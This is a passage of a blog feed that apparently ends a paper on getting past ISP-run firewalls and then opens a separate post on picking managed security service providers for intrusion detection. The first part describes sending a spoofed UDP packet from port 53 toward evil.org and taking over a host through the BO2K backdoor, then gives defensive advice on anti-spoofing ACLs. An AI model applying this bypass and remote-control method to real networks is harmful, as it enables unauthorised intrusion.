this has been happened).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Send the following fake UDP packet from mean.com:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;src_ip:src_port&lt;span style=""&gt;              &lt;/span&gt;dst_ip:dst_port&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;salesguy.nice.com:53&lt;span style=""&gt;         &lt;/span&gt;evil.org:1138&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Start our BO2K administration software, and connect to evil.org:1138. We &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;should[2] now have control over salesguy.nice.com.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Conclusion&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;----------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Historically, it has been well documented in security papers that UDP is a &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;very difficult protocol to handle securely. Despite this well known fact, more &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;and more applications have been built on this weak foundation. The reasons &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;vary, but the truth is that UDP is a very simple (and fast) protocol to base &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;higher level protocols on. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Customers should not rely solely on the protection offered by the ISP when &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;purchasing this type of service. This paper has discussed two attacks against&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;a poorly implemented "centralized firewall", with a few hints towards other&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;attacks. It should be clear that this is a very real threat. Failure to &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;recognize this fact could lead to a very embarrassing compromise.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;It is imperative that there's some form of spoofing protection in place on &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;the company's border perimeter. In&lt;span style=""&gt;  &lt;/span&gt;figure 1, this can easily be achieved by &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;using regular ACLs on the Access Router (2). Without having delved too deep &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;into the matter, it is possible that CEF[4] could be used too. CEF, however,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;does not work on all Cisco IOS routers; consult your manual.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;If RACLs (figure 2) are used, the ISP can prevent spoofing by using separate&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;RACLs for each customer. This, however, can become a huge configuration issue,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;depending on how many dial-up customers the ISP has.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Addendum&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;--------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;It should also be noted that some ISPs also provide a hosting service with&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;"firewall protection". Figure 4 shows a general overview. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;     &lt;/span&gt;&lt;span style=""&gt;                              &lt;/span&gt;{Internet}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                       &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                   &lt;/span&gt;+--------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                   &lt;/span&gt;| Router |&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                   &lt;/span&gt;+--------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                    &lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                  &lt;/span&gt;+----------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                  &lt;/span&gt;| Firewall | &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                  &lt;/span&gt;+----------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                       &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                        &lt;/span&gt;+------+&lt;span style=""&gt;   &lt;/span&gt;+--------+&lt;span style=""&gt;   &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;           &lt;/span&gt;&lt;span style=""&gt;             &lt;/span&gt;| Cust |---| Switch |---| Cust |&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                        &lt;/span&gt;+------+&lt;span style=""&gt;   &lt;/span&gt;+--------+&lt;span style=""&gt;   &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                       &lt;/span&gt;| &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                    &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                    &lt;/span&gt;| Cust |&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                     &lt;/span&gt;&lt;span style=""&gt;               &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                    &lt;/span&gt;Figure 4&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;The "Cust" machines are customer servers, with perhaps one or more of the&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;following scenarios:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;- owned by ISP, customer has no root access&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;- owned by ISP, multihomed, customers have no root access&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;- owned by customer, customer has root access&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;When the machine is owned by the ISP, there is a distict possibility that&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;the ISP will try to confine the customer to a "safe"[5] environment.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Usually the customers are separated from each other on a switch with VLANs to&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;prevent them from attacking each other. However, if the theory described above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;works, there is no reason the tricks described in the attack section shouldn't&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;apply here.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;  &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;--&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;[1] Infamous scanner written by Fyodor (found at http://www.insecure.org).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;[2] Of course, as I disclaimed in the beginning, only if this theory works!!&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;[3] "-conf" is the usual extension used by Cisco router configurations.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;[4] Cisco Express Forwarding (http://www.cisco.com/univercd/cc/td/doc/&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;    &lt;/span&gt;product/software/ios112/ios112p/gsr/cef.htm#xtocid262640). A layer 3 &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;    &lt;/span&gt;switching mechanism.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;[5] Probably exploitable.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-2347529749217098407?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/2347529749217098407/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=2347529749217098407' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/2347529749217098407'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/2347529749217098407'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/network-flight-recorder-new-tool-for.html' title='Network Flight Recorder – A New Tool for the War'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-1715603319865567997</id><published>2008-03-25T12:03:00.000-07:00</published><updated>2008-03-25T12:04:28.622-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Managed Security Services: an IDS solution</title><content type='html'>&lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;In this age of highly networked computers, e-business success can only be achieved by protecting valuable business assets: from the organization’s information, or research and development projects and highly skilled professionals that make it happen, to the IT infrastructure that we all have grown to depend on for all aspects of e-business. Protecting the organization’s assets is a matter of saving money and protecting well-guarded prestige. Such protection can only be achieved with a forward-thinking approach of planning, prevention and timely implementation of security measures. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Intrusion detection systems (IDSs) form an important component of this prevention and protection effort, as one layer in the defense in-depth approach, by aiding with automated monitoring and analysis of events in computer systems and networks. Like any other IT-based solution, it is only as good as the organization’s effort to implement, maintain and operate it. The core component for this operation is the analyst who actually makes sense of the numerous outputs and builds on previous experience to achieve the best tool of defense in this prevention/protection mechanism. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Outsourcing as a solution&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Companies face a variety of challenges with the ever changing technology on which their communications infrastructure is based, and fulfilling the staff requirements to support it. Some organizations do not have enough IT staff, especially in the security arena, to spare even a few individuals to administer yet another system of computers. Network and system administrators are just too busy keeping the operations working. Other security professionals have their resources prioritize looking at the bigger picture and planning other e-business initiatives, such as VPNs and PKI, essential to many organizations. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;For the highly enterprising security professional, going about doing the research to find the solution that best suits the organization’s needs for an intrusion detection system implementation, procuring the needed hardware and software and, installing IDS components is just the beginning. The initial research, acquisition and deployment is followed by numerous hours of data and correlation analysis, and keeping up with IDS system updates, technology and the infrastructure that it is designed to protect. For the organization, owning the implementation of an intrusion detection systems means capital investment on hardware and software and, requiring staffing support around the clock to respond to intrusions as real-time emergencies, a problem resolution escalation procedure and specialists to fill the various levels of expertise required for this operation, analysis and problem resolution.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Acquiring services from a managed security services provider (MSSP) comes as an alternative to the corporate investment in specialized hardware and software. Also, with staffing limitations that many organizations face, the implementation of an intrusion detection system, given what was discussed earlier, may seem more a burden than a necessary step toward a comprehensive security solution. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;There is always room for entrepreneurial efforts that provide something that is needed to the organization that does not have the resources to implement and support an intrusion detection system. Still, management needs to task the security professional to find the solution to defining what is wanted and required, and how to go about obtaining and supporting it.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;A word of caution for those exploring acquiring a managed security services provider as the IDS solution for the organization: do not be confused between managed security services providers (MSSPs) and managed security providers (MSPs). The latter may provide many security related services, but not necessarily installation, administration and monitoring of sensors, data analysis and incident forensics. Still managed security providers may support the development and implementation of many security initiatives for which the organization does not have resources or in-house know-how.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Managed Security Services Providers as a Solution&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Managed security services providers facilitate hardware, software and services to manage and improve on the organization’s network and system security. Hardware and software provide the basis for sensors or data collectors. Sensors may be network-based which collect network packets as data, or host-based which collect system log entries and/or operating system audit trails data. MSSPs provide services to design, deploy, manage and monitor an intrusion detection system for a customer organization that does not possess the staff or other resources to provide such essential service for themselves. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;At the core of managed security services monitoring is the security operations center (SOC) where data collected from the sensors is merged, normalized and analyzed. SOCs are staffed 24x7 with analysts as the first step in the escalating process of evaluating suspicious events registered by the intrusion detection system and determining an appropriate handling response. There are various levels of analysis done to the data in the effort of determining if an event is an actual intrusion incident: data mining and correlation techniques are performed including aggregation of events and incidents recorded from other customer sites as well as global incident response centers.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;By the way, when it comes to monitoring, alert and incident handling coverage provided by the SOC, don’t think that services are any more comprehensive if a managed security services provider happens to mention that they provide 24x7x365 monitoring as opposed to simply 24x7. The 365 sounds impressive, but it adds no additional meaning nor coverage. Actually, this could be a dangerous thing: consider what would happen to the 366&lt;sup&gt;th&lt;/sup&gt; day in a leap year…&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Considerations When Selecting an MSSP&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;There are many aspects to consider when selecting a managed security services provider. The organization must identify its security needs to find a provider that can meet them. Not all considerations may be important to an organization because it will depend on resources needed and wanted. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Your organization and the selected MSSP will draw a service level agreement which determines the level and quality of service to be provided by the MSSP and expected from the organization. The service level agreement needs to be negotiated in advance for a clear understating of services and cost. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;MSSPs offer various pre-packaged service level agreements that might fit your organization’s needs or can be customized to the specific needs.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Here are some aspects to consider on the road of identifying the organization requirements and selecting a managed security services provider:&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Technology. Managed security services providers      offer a variety of technical solutions through software and hardware from      various vendors. The solution that is best for your organization will be      largely dependent of how much control or hands-on your organization wants,      requires and can afford. Another aspect of the same issue is how much the      managed security service provider is able to provide. The two hold an      inversely proportional relationship. The systems and network      infrastructure where the IDS will reside is a deterministic factor as      well.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 5pt 36pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Consider some details on the technical requirements:&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Network-based sensors deployment and support. Network speed must be taken into consideration since sensors need to keep up with the data that are trying to collect.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Host-based sensors deployment and support. Host-based sensors analysis is another aspect of defense in-depth, therefore it should be an integral part of the IDS and the data correlation analysis performed.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Sensor management. Hands-on support in your organization and the MSSP’s technical capacity to remotely manage sensors are factors in this matter&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Sensor signature upgrade capabilities and timing. Depending on the specific implementation, the product(s) deployed may have capabilities for signature development. Signatures updates can be supplied by the IDS software vendor or by MSSP support for quick implementation and protection.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;System tuning. System tuning is an on-going process to minimize false-positives, which is essential to focus efforts on 